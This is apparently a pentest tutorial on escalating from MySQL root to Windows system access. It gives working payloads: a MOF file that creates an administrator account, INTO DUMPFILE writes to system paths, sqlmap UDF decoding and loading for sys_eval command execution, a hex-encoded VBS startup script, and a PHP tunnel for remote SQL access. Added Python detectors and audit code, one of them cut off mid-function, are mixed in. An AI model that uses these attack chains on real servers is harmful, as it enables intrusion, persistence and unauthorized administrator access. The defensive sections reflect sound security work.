MySQL Privilege Escalation

Prerequisites:

  • MySQL root privileges
  • Permission to execute SQL statements

Querying MySQL account passwords

# MySQL <= 5.6
mysql> select host, user, password from mysql.user;

# MySQL >= 5.7
mysql> select host, user, authentication_string from mysql.user;
# The values returned are password hashes, not plaintext

MOF Privilege Escalation

This technique relies on the nullevt.mof file in the C:\Windows\System32\wbem\MOF directory.

Because that file is processed once every minute, a cmd command written into it gets executed.

Part of this MOF is a script, so the script can be used to invoke CMD and run system commands; if MySQL has permission to write to the mof directory, arbitrary commands can be executed.

Exploitation conditions:

  • Only applies to older Windows versions
  • Read/write permission on the C:\Windows\System32\wbem\MOF directory

MOF file content to upload

#pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hacker P@ssw0rd /add\")\nWSH.run(\"net.exe localgroup administrators hacker /add\")";
};

instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

Use MySQL's file-write capability to place this MOF file in the C:/Windows/system32/wbem/mof/ directory: convert the code above to hexadecimal, prefix it with 0x, and write it with INTO DUMPFILE.

select 0x<hex-encoded MOF content from above>
into dumpfile "C:/windows/system32/wbem/mof/test.mof";

When it is processed successfully, test.mof appears in c:/windows/system32/wbem/good/; otherwise it ends up in c:/windows/system32/wbem/bad/.

The hacker user is then created.
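What this technique leaves behind is a permanent WMI event subscription: an __EventFilter, a script consumer, and a __FilterToConsumerBinding tying them together. As an added example that is not part of the original article, the following Python script parses a MOF file of that shape and flags every binding whose consumer is an ActiveScriptEventConsumer or CommandLineEventConsumer, which is the check a defender runs when triaging files under wbem\mof\good or a dump of root\subscription. The embedded sample MOF is constructed for this example (its ScriptText is a placeholder, not the page's payload), the regex parser only resolves $alias references (the way the MOF above links filter and consumer), and the function names and marker list are this example's own.

```python
import re

# Constructed sample: a permanent WMI event subscription in MOF form, shaped like the
# one discussed above. The ScriptText body is a placeholder.
SAMPLE_MOF = r'''
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"cmd.exe /c echo placeholder\")";
};

instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
'''

# One "instance of <class> [as $alias] { ... };" declaration at a time.
INSTANCE_RE = re.compile(r'instance\s+of\s+(\w+)(?:\s+as\s+\$(\w+))?\s*\{(.*?)\};', re.S)
# Property = "literal" "literal" ...;  adjacent literals are concatenated, as in C.
STR_PROP_RE = re.compile(r'(\w+)\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);', re.S)
STR_LIT_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Property = $alias;  a reference to another instance declared in the same file.
REF_PROP_RE = re.compile(r'(\w+)\s*=\s*\$(\w+)\s*;')

# Consumer classes whose payload is an arbitrary script or command line.
SCRIPT_CONSUMERS = {'ActiveScriptEventConsumer', 'CommandLineEventConsumer'}
SHELL_MARKERS = ('wscript.shell', 'cmd.exe', 'powershell', 'net.exe', 'net user', 'net localgroup')


def _unescape(literal):
    # Resolve the MOF string escapes \" \\ \n \t
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), literal)


def parse_mof(text):
    """Return one {'class', 'alias', 'props'} dict per instance declaration."""
    instances = []
    for cls, alias, body in INSTANCE_RE.findall(text):
        props = {}
        for name, literals in STR_PROP_RE.findall(body):
            props[name] = ''.join(_unescape(lit) for lit in STR_LIT_RE.findall(literals))
        for name, ref in REF_PROP_RE.findall(body):
            props[name] = '$' + ref
        instances.append({'class': cls, 'alias': alias, 'props': props})
    return instances


def find_script_bindings(text):
    """Flag every __FilterToConsumerBinding whose consumer runs a script or command line."""
    instances = parse_mof(text)
    by_alias = {i['alias']: i for i in instances if i['alias']}
    findings = []
    for binding in instances:
        if binding['class'] != '__FilterToConsumerBinding':
            continue
        consumer = by_alias.get(binding['props'].get('Consumer', '').lstrip('$'))
        flt = by_alias.get(binding['props'].get('Filter', '').lstrip('$'))
        if consumer is None or consumer['class'] not in SCRIPT_CONSUMERS:
            continue
        payload = consumer['props'].get('ScriptText') or consumer['props'].get('CommandLineTemplate', '')
        findings.append({
            'consumer': consumer['props'].get('Name'),
            'consumer_class': consumer['class'],
            'filter': flt['props'].get('Name') if flt else None,
            'query': flt['props'].get('Query') if flt else None,
            'shell_markers': [m for m in SHELL_MARKERS if m in payload.lower()],
        })
    return findings


if __name__ == '__main__':
    for finding in find_script_bindings(SAMPLE_MOF):
        print(finding)
```

The same check can be made against a live host by listing the __EventFilter, __EventConsumer and __FilterToConsumerBinding classes in the root\subscription namespace (for example with Get-WmiObject -Namespace root\subscription); a filter on Win32_LocalTime bound to a script consumer is the signature of this persistence pattern.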

Remediation

# Stop the winmgmt service
net stop winmgmt

# Delete the Repository folder
rmdir /s /q C:\Windows\system32\wbem\Repository\

# Manually delete the mof file
del C:\Windows\system32\wbem\mof\good\test.mof /F /S

# Delete the created user
net user hacker /delete

# Restart the service
net start winmgmt

UDF Privilege Escalation

User-defined functions (UDFs) are an extension of the database's functionality. Through a UDF, a user can implement features that are not easily achieved in MySQL itself; the added functions can be called from SQL statements just as conveniently as built-in functions such as version().

Exploitation conditions:

For MySQL >= 5.1, the UDF dynamic link library udf.dll must be placed in the MySQL\Lib\Plugin\ folder under the MySQL installation directory. This directory does not exist by default, so the webshell is used to locate the MySQL installation directory, create the MySQL\Lib\Plugin\ folder there, and then import udf.dll into it.

For MySQL <= 5.1, udf.dll is placed in c:/windows/system32/ on Windows Server 2003 and in c:/winnt/system32/ on Windows Server 2000.

Control of the MySQL root account, which provides the insert and delete privileges on the mysql database needed to create and drop functions.

Permission to write udf.dll into the corresponding directory.

Location of sqlmap's UDF dynamic link library files

sqlmap/data/udf/mysql

These dll files are stored encoded and must be decoded first; sqlmap's decoder is located at

sqlmap/extra/cloak/cloak.py

Decoding is done as follows

# Decode the 32-bit Linux shared library
cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_32.so

# Decode the 64-bit Linux shared library
cloak.py -d -i ../../data/udf/mysql/linux/64/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so

# Decode the 32-bit Windows dynamic link library
cloak.py -d -i ../../data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll

# Decode the 64-bit Windows dynamic link library
cloak.py -d -i ../../data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll

Check the MySQL plugin directory

show variables like '%plugin%';

If the directory does not exist, it can be created manually

Write permission is required

# Check the MySQL installation directory
select @@basedir;

# Create the lib\plugin\ folder (writing to the ::$index_allocation NTFS stream creates a directory)
select 1 into dumpfile 'C:\\PhpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$index_allocation';

Write the dynamic link library into the MySQL plugin directory

select load_file('sqlmap/extra/cloak/lib_mysqludf_sys_64.dll')
into outfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll';

select load_file('sqlmap/extra/cloak/lib_mysqludf_sys_64.dll')
into dumpfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll';

# The content can also be hex-encoded
select hex(load_file('sqlmap/extra/cloak/lib_mysqludf_sys_64.dll'))
into outfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll';

sqlmap.py -u http://127.0.0.1/?id=1 --file-write lib_mysqludf_sys_64.dll
--file-dest 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'

Create the user-defined function

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';

Check whether the function was created successfully

select * from mysql.func;

Execute a command

select sys_eval('ipconfig');

Drop the user-defined function

drop function sys_eval;
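The conditions listed under the prerequisites and in this UDF section (a root account, often with an empty password or reachable remotely, the FILE privilege, an unrestricted secure_file_priv, a writable plugin_dir, and a loaded sys_eval) are exactly what a defender should audit on a MySQL server. The following Python function is an added example, not from the original article or from sqlmap: it takes rows shaped like the output of SHOW VARIABLES, SELECT ... FROM mysql.user and SELECT ... FROM mysql.func and returns severity-tagged findings. The sample rows and the placeholder hashes are constructed, and the function names, severity labels and UDF name list are this example's own.

```python
# Constructed sample rows, shaped like the output of these queries (hashes are placeholders):
#   SHOW VARIABLES WHERE Variable_name IN ('secure_file_priv', 'plugin_dir');
#   SELECT user, host, file_priv, authentication_string FROM mysql.user;  -- 5.7+ column name
#   SELECT name, dl FROM mysql.func;
SAMPLE_VARS = {
    'secure_file_priv': '',                                    # '' = unrestricted, 'NULL' = disabled
    'plugin_dir': 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/',
}
SAMPLE_USERS = [
    # (user, host, file_priv, authentication_string)
    ('root', 'localhost', 'Y', '*' + 'A' * 40),
    ('root', '%', 'Y', ''),                        # remote root with no password
    ('webapp', 'localhost', 'Y', '*' + 'B' * 40),  # application account holding FILE
    ('report', '10.0.0.%', 'N', '*' + 'C' * 40),
]
SAMPLE_FUNCS = [('sys_eval', 'lib_mysqludf_sys_64.dll')]

# UDF names and library stems associated with OS command execution (lib_mysqludf_sys).
SHELL_UDFS = {'sys_eval', 'sys_exec', 'sys_get', 'sys_set'}
KNOWN_UDF_LIBS = ('lib_mysqludf_sys',)


def _norm(path):
    """Normalise a path so Windows and POSIX spellings compare equal."""
    return path.replace('\\', '/').rstrip('/').lower()


def audit_mysql(variables, users, funcs):
    """Return (severity, message) tuples for the conditions the escalation chains above rely on."""
    findings = []
    sfp = variables.get('secure_file_priv')
    plugin_dir = variables.get('plugin_dir', '')
    if sfp in (None, 'NULL'):
        pass  # LOAD_FILE / INTO DUMPFILE are disabled entirely: nothing to report
    elif sfp == '':
        findings.append(('HIGH', 'secure_file_priv is empty: INTO DUMPFILE can write wherever mysqld has rights'))
    elif _norm(sfp) == _norm(plugin_dir):
        findings.append(('HIGH', f'secure_file_priv points at plugin_dir ({plugin_dir}): UDF libraries can be dropped'))

    for user, host, file_priv, auth in users:
        if auth == '':
            findings.append(('HIGH', f"'{user}'@'{host}' has an empty authentication_string"))
        if user == 'root' and host == '%':
            findings.append(('HIGH', "root is reachable from any host ('%')"))
        if file_priv == 'Y':
            # root@localhost holding FILE is the default; anyone else is a finding
            sev = 'INFO' if (user, host) == ('root', 'localhost') else 'HIGH'
            findings.append((sev, f"FILE privilege granted to '{user}'@'{host}'"))

    for name, dl in funcs:
        suspicious = name.lower() in SHELL_UDFS or any(k in dl.lower() for k in KNOWN_UDF_LIBS)
        findings.append(('CRITICAL' if suspicious else 'INFO', f'UDF {name} loaded from {dl}'))
    return findings


if __name__ == '__main__':
    for severity, message in audit_mysql(SAMPLE_VARS, SAMPLE_USERS, SAMPLE_FUNCS):
        print(f'[{severity}] {message}')
```

A hardened server sets secure_file_priv to NULL (or to a dedicated export directory that is not plugin_dir), grants FILE to no account other than root@localhost, and has an empty mysql.func unless a UDF is deliberately deployed. Running mysqld under a low-privilege service account is the other half of the mitigation, since INTO DUMPFILE can only write where the server process itself has rights.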

Uploading a PHP tunnel script for Navicat when a direct connection is not possible

The script is as follows

<?php	//version my202

//set allowTestMenu to false to disable System/Server test page
$allowTestMenu = true;

$use_mysqli = function_exists("mysqli_connect");

header("Content-Type: text/plain; charset=x-user-defined");
error_reporting(0);
set_time_limit(0);

function phpversion_int()
{
list($maVer, $miVer, $edVer) = preg_split("(/|\.|-)", phpversion());
return $maVer*10000 + $miVer*100 + $edVer;
}

if (phpversion_int() < 50300)
{
set_magic_quotes_runtime(0);
}

function GetLongBinary($num)
{
return pack("N",$num);
}

function GetShortBinary($num)
{
return pack("n",$num);
}

function GetDummy($count)
{
$str = "";
for($i=0;$i<$count;$i++)
$str .= "\x00";
return $str;
}

function GetBlock($val)
{
$len = strlen($val);
if( $len < 254 )
return chr($len).$val;
else
return "\xFE".GetLongBinary($len).$val;
}

function EchoHeader($errno)
{
$str = GetLongBinary(1111);
$str .= GetShortBinary(202);
$str .= GetLongBinary($errno);
$str .= GetDummy(6);
echo $str;
}

function EchoConnInfo($conn)
{
if ($GLOBALS['use_mysqli']) {
$str = GetBlock(mysqli_get_host_info($conn));
$str .= GetBlock(mysqli_get_proto_info($conn));
$str .= GetBlock(mysqli_get_server_info($conn));
echo $str;
} else {
$str = GetBlock(mysql_get_host_info($conn));
$str .= GetBlock(mysql_get_proto_info($conn));
$str .= GetBlock(mysql_get_server_info($conn));
echo $str;
}
}

function EchoResultSetHeader($errno, $affectrows, $insertid, $numfields, $numrows)
{
$str = GetLongBinary($errno);
$str .= GetLongBinary($affectrows);
$str .= GetLongBinary($insertid);
$str .= GetLongBinary($numfields);
$str .= GetLongBinary($numrows);
$str .= GetDummy(12);
echo $str;
}

function EchoFieldsHeader($res, $numfields)
{
$str = "";
for( $i = 0; $i < $numfields; $i++ ) {
if ($GLOBALS['use_mysqli']) {
$finfo = mysqli_fetch_field_direct($res, $i);
$str .= GetBlock($finfo->name);
$str .= GetBlock($finfo->table);

$type = $finfo->type;
$length = $finfo->length;

$str .= GetLongBinary($type);

$intflag = $finfo->flags;
$str .= GetLongBinary($intflag);

$str .= GetLongBinary($length);
} else {
$str .= GetBlock(mysql_field_name($res, $i));
$str .= GetBlock(mysql_field_table($res, $i));

$type = mysql_field_type($res, $i);
$length = mysql_field_len($res, $i);
switch ($type) {
case "int":
if( $length > 11 ) $type = 8;
else $type = 3;
break;
case "real":
if( $length == 12 ) $type = 4;
elseif( $length == 22 ) $type = 5;
else $type = 0;
break;
case "null":
$type = 6;
break;
case "timestamp":
$type = 7;
break;
case "date":
$type = 10;
break;
case "time":
$type = 11;
break;
case "datetime":
$type = 12;
break;
case "year":
$type = 13;
break;
case "blob":
if( $length > 16777215 ) $type = 251;
elseif( $length > 65535 ) $type = 250;
elseif( $length > 255 ) $type = 252;
else $type = 249;
break;
default:
$type = 253;
}
$str .= GetLongBinary($type);

$flags = explode( " ", mysql_field_flags ( $res, $i ) );
$intflag = 0;
if(in_array( "not_null", $flags )) $intflag += 1;
if(in_array( "primary_key", $flags )) $intflag += 2;
if(in_array( "unique_key", $flags )) $intflag += 4;
if(in_array( "multiple_key", $flags )) $intflag += 8;
if(in_array( "blob", $flags )) $intflag += 16;
if(in_array( "unsigned", $flags )) $intflag += 32;
if(in_array( "zerofill", $flags )) $intflag += 64;
if(in_array( "binary", $flags)) $intflag += 128;
if(in_array( "enum", $flags )) $intflag += 256;
if(in_array( "auto_increment", $flags )) $intflag += 512;
if(in_array( "timestamp", $flags )) $intflag += 1024;
if(in_array( "set", $flags )) $intflag += 2048;
$str .= GetLongBinary($intflag);

$str .= GetLongBinary($length);
}
}
echo $str;
}

function EchoData($res, $numfields, $numrows)
{
for( $i = 0; $i < $numrows; $i++ ) {
$str = "";
$row = null;
if ($GLOBALS['use_mysqli'])
$row = mysqli_fetch_row( $res );
else
$row = mysql_fetch_row( $res );
for( $j = 0; $j < $numfields; $j++ ){
if( is_null($row[$j]) )
$str .= "\xFF";
else
$str .= GetBlock($row[$j]);
}
echo $str;
}
}


function doSystemTest()
{
function output($description, $succ, $resStr) {
echo "<tr><td class=\"TestDesc\">$description</td><td ";
echo ($succ)? "class=\"TestSucc\">$resStr[0]</td></tr>" : "class=\"TestFail\">$resStr[1]</td></tr>";
}
output("PHP version >= 4.0.5", phpversion_int() >= 40005, array("Yes", "No"));
output("mysql_connect() available", function_exists("mysql_connect"), array("Yes", "No"));
output("mysqli_connect() available", function_exists("mysqli_connect"), array("Yes", "No"));
if (phpversion_int() >= 40302 && substr($_SERVER["SERVER_SOFTWARE"], 0, 6) == "Apache" && function_exists("apache_get_modules")){
if (in_array("mod_security2", apache_get_modules()))
output("Mod Security 2 installed", false, array("No", "Yes"));
}
}

/////////////////////////////////////////////////////////////////////////////
////

if (phpversion_int() < 40005) {
EchoHeader(201);
echo GetBlock("unsupported php version");
exit();
}

if (phpversion_int() < 40010) {
global $HTTP_POST_VARS;
$_POST = &$HTTP_POST_VARS;
}

if (!isset($_POST["actn"]) || !isset($_POST["host"]) || !isset($_POST["port"]) || !isset($_POST["login"])) {
$testMenu = $allowTestMenu;
if (!$testMenu){
EchoHeader(202);
echo GetBlock("invalid parameters");
exit();
}
}

if (!$testMenu){
if ($_POST["encodeBase64"] == '1') {
for($i=0;$i<count($_POST["q"]);$i++)
$_POST["q"][$i] = base64_decode($_POST["q"][$i]);
}

if (!function_exists("mysql_connect") && !function_exists("mysqli_connect")) {
EchoHeader(203);
echo GetBlock("MySQL not supported on the server");
exit();
}

$errno_c = 0;
$hs = $_POST["host"];
if ($use_mysqli) {
if( $_POST["port"] )
$conn = mysqli_connect($hs, $_POST["login"], $_POST["password"], "", $_POST["port"]);
else
$conn = mysqli_connect($hs, $_POST["login"], $_POST["password"]);
$errno_c = mysqli_connect_errno($conn);
if($errno_c > 0) {
EchoHeader($errno_c);
echo GetBlock(mysqli_connect_error($conn));
exit;
}

if(($errno_c <= 0) && ( $_POST["db"] != "" )) {
$res = mysqli_select_db($conn, $_POST["db"] );
$errno_c = mysqli_errno($conn);
}

EchoHeader($errno_c);
if($errno_c > 0) {
echo GetBlock(mysqli_error($conn));
} elseif($_POST["actn"] == "C") {
EchoConnInfo($conn);
} elseif($_POST["actn"] == "Q") {
for($i=0;$i<count($_POST["q"]);$i++) {
$query = $_POST["q"][$i];
if($query == "") continue;
if (phpversion_int() < 50400){
if(get_magic_quotes_gpc())
$query = stripslashes($query);
}
$res = mysqli_query($conn, $query);
$errno = mysqli_errno($conn);
$affectedrows = mysqli_affected_rows($conn);
$insertid = mysqli_insert_id($conn);
if (false !== $res) {
$numfields = mysqli_field_count($conn);
$numrows = mysqli_num_rows($res);
}
else {
$numfields = 0;
$numrows = 0;
}
EchoResultSetHeader($errno, $affectedrows, $insertid, $numfields, $numrows);
if($errno > 0)
echo GetBlock(mysqli_error($conn));
else {
if($numfields > 0) {
EchoFieldsHeader($res, $numfields);
EchoData($res, $numfields, $numrows);
} else {
if(phpversion_int() >= 40300)
echo GetBlock(mysqli_info($conn));
else
echo GetBlock("");
}
}
if($i<(count($_POST["q"])-1))
echo "\x01";
else
echo "\x00";
if (false !== $res)
mysqli_free_result($res);
}
}
} else {
if( $_POST["port"] ) $hs .= ":".$_POST["port"];
$conn = mysql_connect($hs, $_POST["login"], $_POST["password"]);
$errno_c = mysql_errno();
//if (phpversion_int() >= 50203){ // for unicode database name
// mysql_set_charset('UTF8');
//}
if(($errno_c <= 0) && ( $_POST["db"] != "" )) {
$res = mysql_select_db( $_POST["db"], $conn);
$errno_c = mysql_errno();
}

EchoHeader($errno_c);
if($errno_c > 0) {
echo GetBlock(mysql_error());
} elseif($_POST["actn"] == "C") {
EchoConnInfo($conn);
} elseif($_POST["actn"] == "Q") {
for($i=0;$i<count($_POST["q"]);$i++) {
$query = $_POST["q"][$i];
if($query == "") continue;
if (phpversion_int() < 50400){
if(get_magic_quotes_gpc())
$query = stripslashes($query);
}
$res = mysql_query($query, $conn);
$errno = mysql_errno();
$affectedrows = mysql_affected_rows($conn);
$insertid = mysql_insert_id($conn);
$numfields = mysql_num_fields($res);
$numrows = mysql_num_rows($res);
EchoResultSetHeader($errno, $affectedrows, $insertid, $numfields, $numrows);
if($errno > 0)
echo GetBlock(mysql_error());
else {
if($numfields > 0) {
EchoFieldsHeader($res, $numfields);
EchoData($res, $numfields, $numrows);
} else {
if(phpversion_int() >= 40300)
echo GetBlock(mysql_info($conn));
else
echo GetBlock("");
}
}
if($i<(count($_POST["q"])-1))
echo "\x01";
else
echo "\x00";
mysql_free_result($res);
}
}
}
exit();
}

header("Content-Type: text/html");
////
/////////////////////////////////////////////////////////////////////////////
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Navicat HTTP Tunnel Tester</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<style type="text/css">
body{
margin: 30px;
font-family: Tahoma;
font-weight: normal;
font-size: 14px;
color: #222222;
}
table{
width: 100%;
border: 0px;
}
input{
font-family:Tahoma,sans-serif;
border-style:solid;
border-color:#666666;
border-width:1px;
}
fieldset{
border-style:solid;
border-color:#666666;
border-width:1px;
}
.Title1{
font-size: 30px;
color: #003366;
}
.Title2{
font-size: 10px;
color: #999966;
}
.TestDesc{
width:70%
}
.TestSucc{
color: #00BB00;
}
.TestFail{
color: #DD0000;
}
.mysql{
}
.pgsql{
display:none;
}
.sqlite{
display:none;
}
#page{
max-width: 42em;
min-width: 36em;
border-width: 0px;
margin: auto auto;
}
#host, #dbfile{
width: 300px;
}
#port{
width: 75px;
}
#login, #password, #db{
width: 150px;
}
#Copyright{
text-align: right;
font-size: 10px;
color: #888888;
}
</style>
<script type="text/javascript">
function getInternetExplorerVersion(){
var ver = -1;
if (navigator.appName == "Microsoft Internet Explorer"){
var regex = new RegExp("MSIE ([0-9]{1,}[\.0-9]{0,})");
if (regex.exec(navigator.userAgent))
ver = parseFloat(RegExp.$1);
}
return ver;
}
function setText(element, text, succ){
element.className = (succ)?"TestSucc":"TestFail";
element.innerHTML = text;
}
function getByteAt(str, offset){
return str.charCodeAt(offset) & 0xff;
}
function getIntAt(binStr, offset){
return (getByteAt(binStr, offset) << 24)+
(getByteAt(binStr, offset+1) << 16)+
(getByteAt(binStr, offset+2) << 8)+
(getByteAt(binStr, offset+3) >>> 0);
}
function getBlockStr(binStr, offset){
if (getByteAt(binStr, offset) < 254)
return binStr.substring(offset+1, offset+1+binStr.charCodeAt(offset));
else
return binStr.substring(offset+5, offset+5+getIntAt(binStr, offset+1));
}
function doServerTest(){
var version = getInternetExplorerVersion();
if (version==-1 || version>=9.0){
var xmlhttp = (window.XMLHttpRequest)? new XMLHttpRequest() : xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");

xmlhttp.onreadystatechange=function(){
var outputDiv = document.getElementById("ServerTest");
if (xmlhttp.readyState == 4){
if (xmlhttp.status == 200){
var errno = getIntAt(xmlhttp.responseText, 6);
if (errno == 0)
setText(outputDiv, "Connection Success!", true);
else
setText(outputDiv, parseInt(errno)+" - "+getBlockStr(xmlhttp.responseText, 16), false);
}else
setText(outputDiv, "HTTP Error - "+xmlhttp.status, false);
}
}

var params = "";
var form = document.getElementById("TestServerForm");
for (var i=0; i<form.elements.length; i++){
if (i>0) params += "&";
params += form.elements[i].id+"="+form.elements[i].value.replace("&", "%26");
}

document.getElementById("ServerTest").className = "";
document.getElementById("ServerTest").innerHTML = "Connecting...";
xmlhttp.open("POST", "", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.send(params);
}else{
document.getElementById("ServerTest").className = "";
document.getElementById("ServerTest").innerHTML = "Internet Explorer "+version+" is not supported, please use Internet explorer 9.0 or above, firefox, chrome or safari";
}
}
</script>
</head>

<body>
<div id="page">
<p>
<font class="Title1">Navicat&trade;</font><br>
<font class="Title2">The gateway to your database!</font>
</p>
<fieldset>
<legend>System Environment Test</legend>
<table>
<tr style="<?php echo "display:none"; ?>"><td width=70%>PHP installed properly</td><td class="TestFail">No</td></tr>
<?php echo doSystemTest();?>
</table>
</fieldset>
<br>
<fieldset>
<legend>Server Test</legend>
<form id="TestServerForm" action="#" onSubmit="return false;">
<input type=hidden id="actn" value="C">
<table>
<tr class="mysql"><td width="35%">Hostname/IP Address:</td><td><input type=text id="host" placeholder="localhost"></td></tr>
<tr class="mysql"><td>Port:</td><td><input type=text id="port" placeholder="3306"></td></tr>
<tr class="pgsql"><td>Initial Database:</td><td><input type=text id="db" placeholder="template1"></td></tr>
<tr class="mysql"><td>Username:</td><td><input type=text id="login" placeholder="root"></td></tr>
<tr class="mysql"><td>Password:</td><td><input type=password id="password" placeholder=""></td></tr>
<tr class="sqlite"><td>Database File:</td><td><input type=text id="dbfile" placeholder="sqlite.db"></td></tr>
<tr><td></td><td><br><input id="TestButton" type="submit" value="Test Connection" onClick="doServerTest()"></td></tr>
</table>
</form>
<div id="ServerTest"><br></div>
</fieldset>
<p id="Copyright">Copyright &copy; PremiumSoft &trade; CyberTech Ltd. All Rights Reserved.</p>
</div>
</body>
</html>

Then connect in Navicat, choose the HTTP tunnel, and enter the remote URL where the PHP script is hosted.

Set the address to localhost and connect; MySQL commands can then be executed through the tunnel.

Startup Item Privilege Escalation

When MySQL can write into the Windows startup locations, it can be used to drop a custom script there; the script runs automatically when a user logs on or when the system starts up or shuts down.

Startup paths

Startup paths on Windows Server 2003

# Chinese-language system
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动
C:\Documents and Settings\All Users\「开始」菜单\程序\启动

# English-language system
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
C:\Documents and Settings\All Users\Start Menu\Programs\Startup

# Startup/shutdown script folders; these must be created manually
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Shutdown

Startup paths on Windows Server 2008

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Knowing the paths, a script can be written into the startup directory. Both vbs and exe files are supported: a vbs can run CMD commands, and an exe can call back to MSF or CS, so the approach is fairly flexible. Below is a VB script that runs basic commands.

Set WshShell=WScript.CreateObject("WScript.Shell")
WshShell.Run "net user hacker P@ssw0rd /add", 0
WshShell.Run "net localgroup administrators hacker /add", 0

Convert the vbs above (or a CS payload) to hexadecimal and write it directly into the system startup directory, then wait for a user to log on again.

mysql> select 0x536574205773685368656C6C3D575363726970742E4372656174654F626A6563742822575363726970742E5368656C6C22290A5773685368656C6C2E52756E20226E65742075736572206861636B6572205040737377307264202F616464222C20300A5773685368656C6C2E52756E20226E6574206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F616464222C20300A into dumpfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\test.vbs";
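All three techniques on this page (MOF, UDF and startup item) leave the same trace in MySQL: a SELECT ... INTO DUMPFILE or INTO OUTFILE aimed at a sensitive Windows path, usually carrying a long hex literal, and in the UDF case a CREATE FUNCTION ... SONAME afterwards. The following Python script is an added example, not part of the original article: it scans MySQL general-log lines (the general_log_output=FILE format, with constructed sample entries embedded) for exactly those statements. The path patterns, the 64-hex-digit threshold and the function names are this example's own choices.

```python
import re

# Constructed sample lines in MySQL general-log file format:
#   <timestamp>  <thread id> <command>  <argument>
SAMPLE_LOG = [
    "2024-03-01T10:00:01.000000Z\t   12 Query\tselect host, user from mysql.user",
    "2024-03-01T10:00:07.000000Z\t   12 Query\tselect 0x" + "41" * 40
    + " into dumpfile 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\test.vbs'",
    "2024-03-01T10:01:30.000000Z\t   12 Query\tselect load_file('C:/tmp/lib_mysqludf_sys_64.dll')"
    " into dumpfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'",
    "2024-03-01T10:01:45.000000Z\t   12 Query\tCREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll'",
    "2024-03-01T10:02:00.000000Z\t   13 Query\tselect id, name from products into outfile '/var/lib/mysql-files/products.csv'",
    "2024-03-01T10:02:10.000000Z\t   13 Connect\tapp@10.0.0.5 on shop",
]

# Locations that, once written, give code execution on the host. First match wins,
# so the specific entries come before the generic System32 one.
SENSITIVE_PATHS = [
    (re.compile(r'start menu[\\/]+programs[\\/]+startup', re.I), 'Startup folder (runs at user logon)'),
    (re.compile(r'grouppolicy[\\/]+machine[\\/]+scripts', re.I), 'Group Policy startup/shutdown scripts'),
    (re.compile(r'wbem[\\/]+mof', re.I), 'WMI MOF auto-compile directory'),
    (re.compile(r'[\\/]+lib[\\/]+plugin[\\/]+', re.I), 'MySQL plugin directory'),
    (re.compile(r'system32[\\/]+', re.I), 'System32'),
]
FILE_WRITE_RE = re.compile(r'\binto\s+(dumpfile|outfile)\s+([\'"])(.*?)\2', re.I | re.S)
CREATE_FUNC_RE = re.compile(
    r'\bcreate\s+(?:aggregate\s+)?function\s+(\w+)\s+returns\s+\w+\s+soname\s+[\'"]([^\'"]+)[\'"]', re.I)
HEX_LITERAL_RE = re.compile(r'\b0x[0-9a-f]{64,}', re.I)   # threshold is this example's choice
LOG_LINE_RE = re.compile(r'^(\S+)\s+(\d+)\s+(\w+)\s+(.*)$', re.S)


def analyse_statement(sql):
    """Return a list of alert strings for one SQL statement (empty when nothing is suspicious)."""
    alerts = []
    m = FILE_WRITE_RE.search(sql)
    if m:
        kind, path = m.group(1).upper(), m.group(3)
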